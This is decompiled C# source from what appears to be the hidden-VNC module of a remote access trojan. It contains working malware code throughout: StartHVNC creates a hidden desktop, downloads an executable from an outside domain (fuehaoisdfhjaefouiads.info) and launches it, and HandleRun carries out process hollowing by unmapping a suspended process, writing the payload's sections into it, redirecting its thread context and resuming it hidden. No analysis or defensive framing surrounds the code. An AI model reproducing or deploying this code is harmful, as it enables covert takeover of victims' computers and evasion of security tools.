// Token: 0x060000E6 RID: 230 RVA: 0x00010928 File Offset: 0x0000EB28
public static void StartHVNC(string ipport)
{
if (!HVNC.Running)
{
HVNC.SA.bInheritHandle = -1;
HVNC.SA.lpSecurityDescriptor = (IntPtr)0L;
HVNC.hNewDesktop = HVNC.CreateDesktop("RemoteDesktop", (IntPtr)0L, (IntPtr)0L, 1u, 511u, HVNC.SA);
RunPE.PROCESS_INFORMATION process_INFORMATION = default(RunPE.PROCESS_INFORMATION);
RunPE.STARTUP_INFORMATION startup_INFORMATION = default(RunPE.STARTUP_INFORMATION);
startup_INFORMATION.cb = Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION));
startup_INFORMATION.lpDesktop = "RemoteDesktop";
string lpApplicationName = Environment.GetFolderPath(Environment.SpecialFolder.System).Substring(0, 3) + "Windows\\explorer.exe";
string lpCommandLine = null;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES2;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES = security_ATTRIBUTES2;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES3 = security_ATTRIBUTES2;
RunPE.CreateProcess(lpApplicationName, lpCommandLine, ref security_ATTRIBUTES, ref security_ATTRIBUTES3, false, 0u, IntPtr.Zero, null, ref startup_INFORMATION, out process_INFORMATION);
WebClient webClient = new WebClient();
byte[] data;
if (Environment.Version.Major == 2)
{
data = webClient.DownloadData("http://fuehaoisdfhjaefouiads.info/HVNC20.exe");
}
if (Environment.Version.Major == 4)
{
data = webClient.DownloadData("http://fuehaoisdfhjaefouiads.info/HVNC40.exe");
}
RunPE.TryRun(Process.GetCurrentProcess().MainModule.FileName, ipport, data, true, true, "RemoteDesktop", ref HVNC.PID);
HVNC.Running = true;
}
}
public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref HVNC.SECURITY_ATTRIBUTES lpProcessAttributes, ref HVNC.SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref RunPE.STARTUP_INFORMATION lpStartupInfo, out RunPE.PROCESS_INFORMATION lpProcessInformation);
// Token: 0x060000A5 RID: 165 RVA: 0x0000BDD0 File Offset: 0x00009FD0
private static bool HandleRun(string path, string cmd, byte[] data, bool compatible, bool hidden = false, string Desktop = "", ref int PID = 0)
{
string text = string.Format("\"{0}\"", path);
RunPE.STARTUP_INFORMATION startup_INFORMATION = default(RunPE.STARTUP_INFORMATION);
RunPE.PROCESS_INFORMATION process_INFORMATION = default(RunPE.PROCESS_INFORMATION);
startup_INFORMATION.cb = Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION));
if (Desktop.Length > 0)
{
startup_INFORMATION.lpDesktop = Desktop;
}
if (hidden)
{
startup_INFORMATION.wShowWindow = 0;
startup_INFORMATION.dwFlags = 1;
}
try
{
if (!string.IsNullOrEmpty(cmd))
{
text = text + " " + cmd;
}
string lpCommandLine = text;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES2;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES = security_ATTRIBUTES2;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES3 = security_ATTRIBUTES2;
if (!RunPE.CreateProcess(path, lpCommandLine, ref security_ATTRIBUTES, ref security_ATTRIBUTES3, false, 4u, IntPtr.Zero, null, ref startup_INFORMATION, out process_INFORMATION))
{
throw new Exception();
}
int num = BitConverter.ToInt32(data, 60);
int num2 = BitConverter.ToInt32(data, num + 52);
int[] array = new int[179];
array[0] = 65538;
if (IntPtr.Size == 4)
{
if (!RunPE.GetThreadContext(process_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
}
else if (!RunPE.Wow64GetThreadContext(process_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
int num3 = array[41];
int num4;
int num5;
if (!RunPE.ReadProcessMemory(process_INFORMATION.ProcessHandle, num3 + 8, ref num4, 4, ref num5))
{
throw new Exception();
}
if (num2 == num4 && RunPE.NtUnmapViewOfSection(process_INFORMATION.ProcessHandle, num4) != 0)
{
throw new Exception();
}
int length = BitConverter.ToInt32(data, num + 80);
int bufferSize = BitConverter.ToInt32(data, num + 84);
int num6 = RunPE.VirtualAllocEx(process_INFORMATION.ProcessHandle, num2, length, 12288, 64);
bool flag;
if (!compatible && num6 == 0)
{
flag = true;
num6 = RunPE.VirtualAllocEx(process_INFORMATION.ProcessHandle, 0, length, 12288, 64);
}
if (num6 == 0)
{
throw new Exception();
}
if (!RunPE.WriteProcessMemory(process_INFORMATION.ProcessHandle, num6, data, bufferSize, ref num5))
{
throw new Exception();
}
int num7 = num + 248;
short num8 = BitConverter.ToInt16(data, num + 6);
int num9 = 0;
int num10 = (int)(num8 - 1);
for (int i = num9; i <= num10; i++)
{
int num11 = BitConverter.ToInt32(data, num7 + 12);
int num12 = BitConverter.ToInt32(data, num7 + 16);
int srcOffset = BitConverter.ToInt32(data, num7 + 20);
if (num12 != 0)
{
byte[] array2 = new byte[num12 - 1 + 1];
Buffer.BlockCopy(data, srcOffset, array2, 0, array2.Length);
if (!RunPE.WriteProcessMemory(process_INFORMATION.ProcessHandle, num6 + num11, array2, array2.Length, ref num5))
{
throw new Exception();
}
}
num7 += 40;
}
byte[] bytes = BitConverter.GetBytes(num6);
if (!RunPE.WriteProcessMemory(process_INFORMATION.ProcessHandle, num3 + 8, bytes, 4, ref num5))
{
throw new Exception();
}
int num13 = BitConverter.ToInt32(data, num + 40);
if (flag)
{
num6 = num2;
}
array[44] = num6 + num13;
if (IntPtr.Size == 4)
{
if (!RunPE.SetThreadContext(process_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
}
else if (!RunPE.Wow64SetThreadContext(process_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
if (RunPE.ResumeThread(process_INFORMATION.ThreadHandle) == -1)
{
throw new Exception();
}
PID = (int)process_INFORMATION.ProcessId;
}
catch (Exception ex)
{
Process processById = Process.GetProcessById((int)process_INFORMATION.ProcessId);
if (processById != null)
{
processById.Kill();
}
return(false);
}
return(true);
}
public static extern IntPtr CreateDesktop(string desktopName, IntPtr device, IntPtr deviceMode, uint flags, uint accessMask, HVNC.SECURITY_ATTRIBUTES attributes);
